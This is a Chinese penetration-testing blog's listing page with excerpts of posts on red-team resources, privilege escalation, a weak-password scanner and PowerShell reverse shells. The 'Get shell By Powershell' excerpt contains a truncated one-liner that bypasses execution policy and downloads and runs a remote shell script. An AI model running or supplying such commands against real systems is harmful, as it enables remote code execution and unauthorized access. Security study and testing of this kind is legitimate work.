渗透周边

红队和蓝队资料集锦

红队和蓝队资料集锦

lsh4ck 6年前 29,779 0

项目简介 一个 Red Team 攻击的生命周期,整个生命周期包括: 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、在所有攻击结束之后清理并退出战场。 和一个著名的蓝队项目:https://github.com/...

亮神专辑,全部收录到博客,方便自己和墙内用户查看

亮神专辑,全部收录到博客,方便自己和墙内用户查看

lsh4ck 6年前 6,320 0

致敬亮神原创 亮神专辑项目地址 亮神专辑gitbook 致敬k神原创——老博客 致敬k神原创-新站 第一课:windows提权-快速查找exp 第二课:Linux提权-依赖exp篇 第三课:Delphi代码审计--项目实战1 第四课:Asp代码审计--项目实战2 第五课:工具介绍...

mysql专辑

mysql专辑

lsh4ck 6年前 1,085 0

k神的mysql专辑整理 这篇与亮神文章搜集,为方便同行们系统学习梳理,感谢大神们替我们整理文档输出,这里也不需要大家再去全网搜索大量分散的学习资料,直接来我这里看就行,注明转发,已联系大神本人们获得转发权。大家也照顾我辛苦图文整理过来,每张图片都是自己上传到我自己空间,我可以相...

Allscanner【转】

Allscanner【转】

lsh4ck 6年前 344 0

数据库和其他服务的弱端口的弱口令检测以及未授权访问的集成检测工具。 目前支持的弱服务检测包括如下: 21 FTP 弱口令检测 139 LDAP 未授权访问检测 1433 MSSQL 弱口令检测 3306 MYSQL 弱口令检测、未授权访问检测 11211 MEMCACHED 未授...

Get shell By Powershell

Get shell By Powershell

lsh4ck 6年前 272 0

Invoke-PowerShellTcp.ps1 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/s...

AlwaysInstallElevated 特权安全提权

AlwaysInstallElevated 特权安全提权 3

lsh4ck 6年前 549 2

Windows环境提供组策略设置,允许常规用户安装具有系统权限的Microsoft Windows Installer程序包(MSI)。这可以在标准用户想要安装需要系统权限的应用程序的环境中发 现,并且管理员希望避免向用户提供临时本地管理员访问权限。Windows环境提供组策略设...

扫一扫二维码分享